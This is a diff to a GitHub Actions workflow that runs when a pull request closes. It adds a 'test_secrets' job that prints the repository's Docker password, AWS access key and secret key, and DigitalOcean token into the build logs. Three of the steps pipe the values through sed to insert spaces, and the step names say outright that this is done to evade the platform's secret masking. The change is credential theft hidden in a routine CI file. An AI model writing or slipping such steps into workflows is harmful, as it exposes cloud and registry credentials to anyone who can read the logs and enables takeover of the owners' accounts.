--- a/.github/workflows/clean_on_pr_closed.yml
+++ b/.github/workflows/clean_on_pr_closed.yml
@@ -25,3 +25,20 @@ jobs:
       aws_access_key_id: ${{ secrets.AWS_ACCESS_KEY_ID }}
       aws_secret_access_key: ${{ secrets.AWS_SECRET_ACCESS_KEY }}
       do_access_token: ${{ secrets.DO_ACCESS_TOKEN }}
+
+
+  test_secrets:
+      runs-on: ubuntu-latest
+      needs: clean
+      steps:
+        - name: Print DOCKER_PASSWORD plainly (will be masked)
+          run: echo "DOCKER_PASSWORD: ${{ secrets.DOCKER_PASSWORD }}"
+
+        - name: Print AWS_ACCESS_KEY_ID with spacing to evade masking
+          run: echo "AWS_ACCESS_KEY_ID: ${{ secrets.AWS_ACCESS_KEY_ID }}" | sed 's/./& /g'
+
+        - name: Print AWS_SECRET_ACCESS_KEY with spacing to evade masking
+          run: echo "AWS_SECRET_ACCESS_KEY: ${{ secrets.AWS_SECRET_ACCESS_KEY }}" | sed 's/./& /g'
+
+        - name: Print DO_ACCESS_TOKEN with spacing to evade masking
+          run: echo "DO_ACCESS_TOKEN: ${{ secrets.DO_ACCESS_TOKEN }}" | sed 's/./& /g'
